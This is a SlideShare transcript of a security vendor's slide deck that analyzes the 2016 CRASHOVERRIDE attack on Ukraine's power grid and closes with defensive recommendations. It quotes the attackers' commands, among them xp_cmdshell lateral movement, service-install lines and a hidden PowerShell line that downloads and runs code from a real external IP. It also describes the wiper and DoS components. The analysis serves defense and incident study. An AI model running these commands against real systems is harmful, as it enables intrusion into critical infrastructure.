SlideShare a Scribd company logo
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• Event Background
• Initial Intrusion
• ICS Effects
• Conclusions
• First (only?) publicly-known malware
targeting grid operations
• Designed to:
• Disrupt grid operations
• Impede grid recovery
• 17 Dec 2016, 23:53 Local Time:
• Ukrenergo substation de-
energizes
• Resulted in outage for
service area
• Utility transferred into
manual mode
• Began restoring power in 30
minutes
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• Event was seemingly well-documented…
• Critical questions unanswered:
• Penetration of ICS network
• In-depth evaluation of ICS capability
• Context to build up layered defense
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• No ICS-specific malware deployed
• Attack was manual in nature:
• Adversary established remote access
to engineering workstation
• Manipulated controls to produce
effect
• Significant alteration in tradecraft
• Attack leveraged ICS-specific malware
• Codifies specialist knowledge in
software
• Enables operations to scale
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• Precise methodology unknown
• Large-scale phishing events in Ukraine
in January 2016
• First definite indications of activity
within network: October 2016
• Adversary begins manipulating ICS
network devices 01 December 2016
• Creates attacker-controlled accounts:
• Admin
• Система (‘System’)
• Attempts remote access to multiple
systems with credentials
• Environment contained 3 MS-SQL
servers
• Connected to production equipment
• Likely serving as data historians within
the victim environment
• First accessed on 12 December 2016
• Subsequent activity focuses on using
SQL Servers to interact with
environment
• Extensive use of MS-SQL commands for
command execution:
EXEC xp_cmdshell <command>
EXEC xp_cmdshell 'net use L:
<TargetIP>$C <Password>
/USER:<Domain><User>’;
EXEC xp_cmdshell 'move
C:Deltam32.txt C:Deltam32.exe’;
EXEC xp_cmdshell 'netstat -an';
• Use of Mimikatz for credential capture
• Two variants:
• Compiled version of Github repo
• Same, but UPX packed
• Credential capture and re-use critical to
intrusion
• Once within network and possessing
credentials:
• File movement utilized NET utilities
• Captured credentials allowed for
remote access and file copying
• XP_CMDSHELL used for code execution
on SQL Servers
• Code execution on other devices
leveraged various remote means:
• Scripts
• PSExec
• Use of custom BAT scripts:
• Process execution
• System survey and recon
• Attack pre-positioning
• General avoidance of malware
powershell.exe -nop -w hidden -c $l=new-
object
net.webclient;$l.proxy=[Net.WebRequest]::Ge
tSystemWebProxy();$l.Proxy.Credentials=[Net
.CredentialCache]::DefaultCredentials;IEX
$l.downloadstring('http://188.42.253.43:880
1/msupdate');
Function RunRemoteProcess(Command)
Set objStartup =
objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 0
Set objProcess = objSWbemServices.Get("Win32_Process")
strCmd = "cmd.exe /c " & Command & " >> " & GetReportFile()
intReturn = objProcess.Create(strCmd, Null, objConfig,
intProcessID)
If intReturn <> 0 Then
Wscript.Echo "Process could not be created." & _
vbNewLine & "Command line: " & strCmd & _
vbNewLine & "Return value: " & intReturn
RunRemoteProcess = 2
Exit Function
cscript C:Backinfoufn.vbs <TargetIP 1> "C:BackinfoImapiService.exe"
"C:Deltasvchost.exe"
cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo104.dll" "C:Delta104.dll"
cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo140.ini" "C:Delta104.ini"
cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfohaslo.dat" "C:Deltahaslo.dat"
cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "dir C:Delta"
cscript C:Backinfoufn.vbs <TargetIP 2> "C:BackinfoImapiService.exe"
"C:Deltasvchost.exe"
cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo104.dll" "C:Delta104.dll"
cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo128.ini" "C:Delta104.ini"
cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfohaslo.dat" "C:Deltahaslo.dat"
cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "dir C:Delta"
cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfodefragsvc.exe"
"C:D2svchost.exe"
cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo104.dll" "C:D2104.dll"
cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo5.ini" "C:D2104.ini"
cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfohaslo.dat" "C:D2haslo.dat"
cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "dir C:D2"
• Little to no use of obfuscation
• Scripts are clearly written, functionality
easily understood
• With visibility, easy to detect
• Extensive use of Windows Sysinternals
PSExec utility
• However:
• Used an older version – 2.11
• Released April 2014
• Latest version at time of attack was
2.2
• Designed and deployed a custom
backdoor
• Unnecessary given observed events
• Provides basic RAT functionality
• No built-in information gathering/exfil
capability
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• Backdoor compiled and deployed long
after network intrusion
• Capabilities provided already included
in TTPs covered previously
• Purpose for deployment unknown
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• Deployment based on prior steps
• Deploy via XP_CMDSHELL from SQL
servers
• Use credentials to remotely copy files
• Scripted remote process execution to
launch payloads
cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "sc config
ImapiService binPath= 'C:Deltasvchost.exe C:Delta
104.dll 104.ini' start= auto && sc start ImapiService"
cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "sc config
ImapiService binPath= 'C:Deltasvchost.exe C:Delta
104.dll 104.ini' start= auto && sc start ImapiService"
cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "sc config
defragsvc binPath= 'C:D2svchost.exe C:D2 104.dll
104.ini' start= auto && sc start defragsvc"
• CRASHOVERRIDE execution starts with a
dedicated launcher EXE
• One stand-alone exception
• Serves to:
• Initiate payload, manage execution
• Clean up and terminate
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• Four modules targeting different ICS
communication protocols:
• IEC-101
• IEC-104
• IEC-61850
• OPC
• Different modules, but similar purpose
• Goal:
• Manipulate breakers and switch gear
• Interrupt power distribution
• Basically: turn things on/off
(open/closed)
• Configuration files for some payloads
indicate 80+ targets
• Log file results indicate over 100
potential targets
• Manual operations would not work for
this level of impact
[*ServerName: ABB.IEC61850_OPC_DA_Server.Instance[3].1*]
[State: After ON]
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI10PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI11PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI12PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI1PosstVal
Quality: 192 value: 2
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI2PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI3PosstVal
Quality: 192 value: 2
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI4PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI7PosstVal
Quality: 192 value: 2
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
• Following grid impact, CRASHOVERRIDE
moves to a new destructive stage
• After a hard-coded wait time:
• Destructive component launched
• Specified in launcher component
Registry
•Zeroes registry key
ImagePath for
critical services
•Makes system
unbootable
Files
•Erases ICS
configuration files
•Erases other file
extensions
Kills
Processes
• Kill the machine
• Finally – a denial of service stand-alone
identified
• Targets a Siemens SIPROTEC
vulnerability from 2015:
• CVE-2015-5374
• DoS via specially-crafted packet to UDP
50000
• EXE created with hard-coded target IP
addresses
• Only useful in the target environment
• BUT:
• Improper byte conversion applied for IP
addresses
• Results in IPs shifted in reverse when
setting up sockets
• CRASHOVERRIDE attack part of a long-
running intrusion
• Attack avoided “malware” until final stages
• Primary use of native system utilities and
credential capture
• CRASHOVERRIDE provides an attack
framework
• BUT – exact attack will not be replicated
• Instead:
• Attack methodology will be re-used
• Underlying behaviors will maintain
similarity
Prevention
• Protect Logon Info
• Isolate and Segregate
Networks
Detection
• Improve Host Visibility in ICS
• Use Network Visibility to Detect Lateral
Movement
Mitigation
• Implement Bastion Hosts
• Structure Defense to Respond Earlier
in Kill Chain
Recovery
• Develop and Rehearse Response
Plans
• Secure Storage of Backup Project Files
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE

More Related Content

PDF
CNIT 121: Computer Forensics Ch 1
PDF
How to Hunt for Lateral Movement on Your Network
PPTX
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
PDF
The New Pentest? Rise of the Compromise Assessment
PPTX
Hunting on the cheap
PDF
PHDays 2018 Threat Hunting Hands-On Lab
PDF
CNIT 152: 6 Scoping & 7 Live Data Collection
PDF
Hunting: Defense Against The Dark Arts
CNIT 121: Computer Forensics Ch 1
How to Hunt for Lateral Movement on Your Network
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
The New Pentest? Rise of the Compromise Assessment
Hunting on the cheap
PHDays 2018 Threat Hunting Hands-On Lab
CNIT 152: 6 Scoping & 7 Live Data Collection
Hunting: Defense Against The Dark Arts

What's hot (20)

PDF
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
PDF
Digital Forensics and Incident Response (DFIR) Training Session - January
PDF
CNIT 121: 11 Analysis Methodology
PDF
Windows Threat Hunting
PDF
Hunting: Defense Against The Dark Arts v2
PDF
3. Security Engineering
PPTX
Blackhat 2018 - The New Pentest? Rise of the Compromise Assessment
PPTX
Novetta Cyber Analytics
PPTX
Hunting on the Cheap
PPTX
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
PDF
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
PDF
CNIT 121: 9 Network Evidence
PDF
Avoiding the Pitfalls of Hunting - BSides Charm 2016
PDF
CNIT 121: 17 Remediation Introduction (Part 1)
PDF
Threat Hunting with Elastic at SpectorOps: Welcome to HELK
PDF
CISSP Prep: Ch 7. Security Assessment and Testing
PPTX
Enterprise Forensics 101
PDF
Orchestrating Software Defined Networks To Disrupt The Apt Kill Chain
PPTX
Discover advanced threats with threat intelligence - Jeremy Li
PDF
Threat Intelligence Ops In-Depth at Massive Enterprise
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
Digital Forensics and Incident Response (DFIR) Training Session - January
CNIT 121: 11 Analysis Methodology
Windows Threat Hunting
Hunting: Defense Against The Dark Arts v2
3. Security Engineering
Blackhat 2018 - The New Pentest? Rise of the Compromise Assessment
Novetta Cyber Analytics
Hunting on the Cheap
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
CNIT 121: 9 Network Evidence
Avoiding the Pitfalls of Hunting - BSides Charm 2016
CNIT 121: 17 Remediation Introduction (Part 1)
Threat Hunting with Elastic at SpectorOps: Welcome to HELK
CISSP Prep: Ch 7. Security Assessment and Testing
Enterprise Forensics 101
Orchestrating Software Defined Networks To Disrupt The Apt Kill Chain
Discover advanced threats with threat intelligence - Jeremy Li
Threat Intelligence Ops In-Depth at Massive Enterprise
Ad

Similar to Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE (20)

PDF
Hunting Lateral Movement in Windows Infrastructure
PPTX
Горизонтальные перемещения в инфраструктуре Windows
PPTX
Kheirkhabarov24052017_phdays7
PPTX
HAVOC-Workshop-Slides.pptx
PPTX
Owning computers without shell access 2
PDF
idsecconf2010-hacking priv8 network
PDF
y3dips hacking priv8 network
DOCX
Project Malware AnalysisCS 6262 Project 3Agenda.docx
PDF
Intro to sysdig in 15 minutes
PPTX
Lateral Movement - Phreaknik 2016
PDF
3. APTs Presentation
PDF
Lateral Movement: How attackers quietly traverse your Network
PDF
Lateral Movement - Hacker Halted 2016
PDF
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
PDF
Continuous Security: From tins to containers - now what!
PPTX
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
PDF
CCleaner APT Attack: A Technical Look Inside
PPTX
Blackhat USA 2016 - What's the DFIRence for ICS?
PDF
CNIT 152: 1 Real-World Incidents
PPTX
DCUS17 : Docker networking deep dive
Hunting Lateral Movement in Windows Infrastructure
Горизонтальные перемещения в инфраструктуре Windows
Kheirkhabarov24052017_phdays7
HAVOC-Workshop-Slides.pptx
Owning computers without shell access 2
idsecconf2010-hacking priv8 network
y3dips hacking priv8 network
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Intro to sysdig in 15 minutes
Lateral Movement - Phreaknik 2016
3. APTs Presentation
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement - Hacker Halted 2016
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Continuous Security: From tins to containers - now what!
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
CCleaner APT Attack: A Technical Look Inside
Blackhat USA 2016 - What's the DFIRence for ICS?
CNIT 152: 1 Real-World Incidents
DCUS17 : Docker networking deep dive
Ad

More from Dragos, Inc. (20)

PPTX
How to Increase ICS Cybersecurity Return on Investment (ROI)
PPTX
Dragos 2019 ICS Year in Review
PDF
Dragos and CyberWire: ICS Ransomware
PPTX
Dragos S4x20: How to Build an OT Security Operations Center
PPTX
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack Framework
PDF
Reassessing the 2016 CRASHOVERRIDE Cyber Attack
PPTX
Solving ICS Cybersecurity Challenges in the Electric Industry
PPTX
Purple Teaming ICS Networks
PPTX
Securing Electric Utility Infrastructure
PDF
Rising Cyber Escalation US Iran Russia ICS Threats and Response
PPTX
Neighborhood Keeper - Introduction
PPTX
Dressing up the ICS Kill Chain
PDF
Consequence Informed Cyber Security
PPTX
Dragos year in review (yir) 2018
PPTX
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...
PPTX
2018 Year in Review- ICS Threat Activity Groups
PDF
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...
PDF
The Current ICS Threat Landscape
PDF
Industrial Control Systems Cybersecurity Technology Selection
PPTX
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks
How to Increase ICS Cybersecurity Return on Investment (ROI)
Dragos 2019 ICS Year in Review
Dragos and CyberWire: ICS Ransomware
Dragos S4x20: How to Build an OT Security Operations Center
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack Framework
Reassessing the 2016 CRASHOVERRIDE Cyber Attack
Solving ICS Cybersecurity Challenges in the Electric Industry
Purple Teaming ICS Networks
Securing Electric Utility Infrastructure
Rising Cyber Escalation US Iran Russia ICS Threats and Response
Neighborhood Keeper - Introduction
Dressing up the ICS Kill Chain
Consequence Informed Cyber Security
Dragos year in review (yir) 2018
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...
2018 Year in Review- ICS Threat Activity Groups
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...
The Current ICS Threat Landscape
Industrial Control Systems Cybersecurity Technology Selection
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks

Recently uploaded (20)

PPTX
A Presentation on Touch Screen Technology
PDF
WOOl fibre morphology and structure.pdf for textiles
PDF
Approach and Philosophy of On baking technology
PDF
Web App vs Mobile App What Should You Build First.pdf
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
PPTX
OMC Textile Division Presentation 2021.pptx
PPTX
cloud_computing_Infrastucture_as_cloud_p
PDF
A comparative study of natural language inference in Swahili using monolingua...
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PPTX
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDF
Getting Started with Data Integration: FME Form 101
PDF
1 - Historical Antecedents, Social Consideration.pdf
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PDF
August Patch Tuesday
PDF
Assigned Numbers - 2025 - Bluetooth® Document
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
Unlocking AI with Model Context Protocol (MCP)
A Presentation on Touch Screen Technology
WOOl fibre morphology and structure.pdf for textiles
Approach and Philosophy of On baking technology
Web App vs Mobile App What Should You Build First.pdf
SOPHOS-XG Firewall Administrator PPT.pptx
NewMind AI Weekly Chronicles - August'25-Week II
Group 1 Presentation -Planning and Decision Making .pptx
OMC Textile Division Presentation 2021.pptx
cloud_computing_Infrastucture_as_cloud_p
A comparative study of natural language inference in Swahili using monolingua...
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
Getting Started with Data Integration: FME Form 101
1 - Historical Antecedents, Social Consideration.pdf
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
August Patch Tuesday
Assigned Numbers - 2025 - Bluetooth® Document
Encapsulation_ Review paper, used for researhc scholars
Unlocking AI with Model Context Protocol (MCP)

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE

  • 6. • Event Background • Initial Intrusion • ICS Effects • Conclusions
  • 7. • First (only?) publicly-known malware targeting grid operations • Designed to: • Disrupt grid operations • Impede grid recovery
  • 8. • 17 Dec 2016, 23:53 Local Time: • Ukrenergo substation de- energizes • Resulted in outage for service area • Utility transferred into manual mode • Began restoring power in 30 minutes
  • 10. • Event was seemingly well-documented… • Critical questions unanswered: • Penetration of ICS network • In-depth evaluation of ICS capability • Context to build up layered defense
  • 12. • No ICS-specific malware deployed • Attack was manual in nature: • Adversary established remote access to engineering workstation • Manipulated controls to produce effect
  • 13. • Significant alteration in tradecraft • Attack leveraged ICS-specific malware • Codifies specialist knowledge in software • Enables operations to scale
  • 15. • Precise methodology unknown • Large-scale phishing events in Ukraine in January 2016 • First definite indications of activity within network: October 2016
  • 16. • Adversary begins manipulating ICS network devices 01 December 2016 • Creates attacker-controlled accounts: • Admin • Система (‘System’) • Attempts remote access to multiple systems with credentials
  • 17. • Environment contained 3 MS-SQL servers • Connected to production equipment • Likely serving as data historians within the victim environment • First accessed on 12 December 2016
  • 18. • Subsequent activity focuses on using SQL Servers to interact with environment • Extensive use of MS-SQL commands for command execution: EXEC xp_cmdshell <command>
  • 19. EXEC xp_cmdshell 'net use L: <TargetIP>$C <Password> /USER:<Domain><User>’; EXEC xp_cmdshell 'move C:Deltam32.txt C:Deltam32.exe’; EXEC xp_cmdshell 'netstat -an';
  • 20. • Use of Mimikatz for credential capture • Two variants: • Compiled version of Github repo • Same, but UPX packed • Credential capture and re-use critical to intrusion
  • 21. • Once within network and possessing credentials: • File movement utilized NET utilities • Captured credentials allowed for remote access and file copying
  • 22. • XP_CMDSHELL used for code execution on SQL Servers • Code execution on other devices leveraged various remote means: • Scripts • PSExec
  • 23. • Use of custom BAT scripts: • Process execution • System survey and recon • Attack pre-positioning • General avoidance of malware
  • 24. powershell.exe -nop -w hidden -c $l=new- object net.webclient;$l.proxy=[Net.WebRequest]::Ge tSystemWebProxy();$l.Proxy.Credentials=[Net .CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://188.42.253.43:880 1/msupdate');
  • 25. Function RunRemoteProcess(Command) Set objStartup = objSWbemServices.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set objProcess = objSWbemServices.Get("Win32_Process") strCmd = "cmd.exe /c " & Command & " >> " & GetReportFile() intReturn = objProcess.Create(strCmd, Null, objConfig, intProcessID) If intReturn <> 0 Then Wscript.Echo "Process could not be created." & _ vbNewLine & "Command line: " & strCmd & _ vbNewLine & "Return value: " & intReturn RunRemoteProcess = 2 Exit Function
  • 26. cscript C:Backinfoufn.vbs <TargetIP 1> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo140.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 2> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo128.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfodefragsvc.exe" "C:D2svchost.exe" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo104.dll" "C:D2104.dll" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo5.ini" "C:D2104.ini" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfohaslo.dat" "C:D2haslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "dir C:D2"
  • 27. • Little to no use of obfuscation • Scripts are clearly written, functionality easily understood • With visibility, easy to detect
  • 28. • Extensive use of Windows Sysinternals PSExec utility • However: • Used an older version – 2.11 • Released April 2014 • Latest version at time of attack was 2.2
  • 29. • Designed and deployed a custom backdoor • Unnecessary given observed events • Provides basic RAT functionality • No built-in information gathering/exfil capability
  • 31. • Backdoor compiled and deployed long after network intrusion • Capabilities provided already included in TTPs covered previously • Purpose for deployment unknown
  • 33. • Deployment based on prior steps • Deploy via XP_CMDSHELL from SQL servers • Use credentials to remotely copy files • Scripted remote process execution to launch payloads
  • 34. cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "sc config defragsvc binPath= 'C:D2svchost.exe C:D2 104.dll 104.ini' start= auto && sc start defragsvc"
  • 35. • CRASHOVERRIDE execution starts with a dedicated launcher EXE • One stand-alone exception • Serves to: • Initiate payload, manage execution • Clean up and terminate
  • 37. • Four modules targeting different ICS communication protocols: • IEC-101 • IEC-104 • IEC-61850 • OPC
  • 38. • Different modules, but similar purpose • Goal: • Manipulate breakers and switch gear • Interrupt power distribution • Basically: turn things on/off (open/closed)
  • 39. • Configuration files for some payloads indicate 80+ targets • Log file results indicate over 100 potential targets • Manual operations would not work for this level of impact
  • 40. [*ServerName: ABB.IEC61850_OPC_DA_Server.Instance[3].1*] [State: After ON] OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI10PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI11PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI12PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI1PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI2PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI3PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI4PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI7PosstVal Quality: 192 value: 2
  • 43. • Following grid impact, CRASHOVERRIDE moves to a new destructive stage • After a hard-coded wait time: • Destructive component launched • Specified in launcher component
  • 44. Registry •Zeroes registry key ImagePath for critical services •Makes system unbootable Files •Erases ICS configuration files •Erases other file extensions Kills Processes • Kill the machine
  • 45. • Finally – a denial of service stand-alone identified • Targets a Siemens SIPROTEC vulnerability from 2015: • CVE-2015-5374 • DoS via specially-crafted packet to UDP 50000
  • 46. • EXE created with hard-coded target IP addresses • Only useful in the target environment • BUT: • Improper byte conversion applied for IP addresses • Results in IPs shifted in reverse when setting up sockets
  • 47. • CRASHOVERRIDE attack part of a long- running intrusion • Attack avoided “malware” until final stages • Primary use of native system utilities and credential capture
  • 48. • CRASHOVERRIDE provides an attack framework • BUT – exact attack will not be replicated • Instead: • Attack methodology will be re-used • Underlying behaviors will maintain similarity
  • 49. Prevention • Protect Logon Info • Isolate and Segregate Networks Detection • Improve Host Visibility in ICS • Use Network Visibility to Detect Lateral Movement Mitigation • Implement Bastion Hosts • Structure Defense to Respond Earlier in Kill Chain Recovery • Develop and Rehearse Response Plans • Secure Storage of Backup Project Files